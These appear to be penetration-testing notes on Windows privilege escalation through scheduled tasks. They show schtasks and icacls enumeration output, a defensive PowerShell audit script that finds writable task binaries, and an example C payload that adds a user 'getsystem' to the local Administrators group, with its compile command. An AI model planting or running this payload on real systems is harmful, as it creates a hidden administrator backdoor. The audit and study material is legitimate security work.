Scheduled Tasks
Three pieces of information are vital to obtain from a scheduled task to identify possible privilege escalation vectors:
1. As which user account (principal) does this task get executed?
2. What triggers are specified for the task?
3. What actions are executed when one or more of these triggers are met?
We should seek interesting information in the Author, TaskName, Task To Run, Run As User, and Next Run Time fields. In our case, "interesting" means that the information partially or completely answers one of the three questions above.
To Check
Get-ScheduledTask
PS C:\Users\root> schtasks /query /fo LIST /v
...
Folder: \Microsoft
HostName: BOSTON
TaskName: \Microsoft\CacheCleanup <- IMPT
Next Run Time: <- IMPT
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 7/11/2022 2:46:22 AM
Last Result: 0
Author: Boston\
Task To Run:
Start In: C:\Users\root\Pictures
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode
Run As User: l
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Minute
Start Time: 7:37:21 AM
Start Date: 7/4/2022
...
PS C:\Users\root> icacls C:\Users\root\Pictures\CacheCleanup.exe
C:\Users\root\Pictures\CacheCleanup.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
CLIENT\root:(I)(F)
CLIENT\Admin:(I)(F)
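The same check automated for every enabled task, as an added audit example that is not part of the original notes: Get-ScheduledTask answers the three questions (principal, triggers, action), and Get-Acl on the action's executable replaces the manual icacls step. The trusted-identity list and the write-rights mask are assumptions chosen for this example.

```powershell
# Added example: enumerate scheduled tasks and flag those whose action binary is
# writable by an identity outside an assumed trusted set. Assumes Windows
# PowerShell 5.1+ with the ScheduledTasks module.

# Assumption: identities whose write access to a task binary is expected.
$trusted = @('NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'NT SERVICE\TrustedInstaller')
# Assumption: rights that let a principal alter or replace the executable.
$writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership'

function Resolve-TaskExecutable {
    param([string]$Execute)
    # Expand %SystemRoot%-style variables and strip quotes so the path can be tested.
    $path = [Environment]::ExpandEnvironmentVariables($Execute.Trim('"'))
    if (-not [IO.Path]::IsPathRooted($path)) {
        # An unqualified name is resolved through PATH, as the Task Scheduler would.
        $cmd = Get-Command $path -CommandType Application -ErrorAction SilentlyContinue
        if ($cmd) { $path = $cmd.Source }
    }
    return $path
}

Get-ScheduledTask | Where-Object { $_.State -ne 'Disabled' } | ForEach-Object {
    $task = $_
    foreach ($action in ($task.Actions | Where-Object { $_.Execute })) {
        $exe = Resolve-TaskExecutable $action.Execute
        if (-not (Test-Path -LiteralPath $exe)) { continue }
        $acl = Get-Acl -LiteralPath $exe
        # Allow ACEs granting a write-class right to anyone outside the trusted set.
        $weak = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $trusted -notcontains $_.IdentityReference.Value -and
            ($_.FileSystemRights -band $writeMask)
        }
        if ($weak) {
            [PSCustomObject]@{
                TaskName   = "$($task.TaskPath)$($task.TaskName)"
                RunAs      = $task.Principal.UserId            # question 1: principal
                RunLevel   = $task.Principal.RunLevel
                Triggers   = ($task.Triggers | ForEach-Object {  # question 2: triggers
                    $_.CimClass.CimClassName -replace '^MSFT_Task', '' }) -join ','
                Action     = "$($action.Execute) $($action.Arguments)".Trim()  # question 3
                WritableBy = ($weak.IdentityReference.Value | Sort-Object -Unique) -join ','
            }
        }
    }
} | Format-Table -AutoSize
```

A task that runs as SYSTEM or another account with an action binary writable by a low-privileged identity is the finding the manual steps above look for; the working directory ("Start In") deserves the same ACL check, which this example omits.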
Example Payload
#include <stdlib.h>

int main(void)
{
    int i;
    i = system("net user getsystem getsystem /add");
    i = system("net localgroup administrators getsystem /add");
    return 0;
}
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe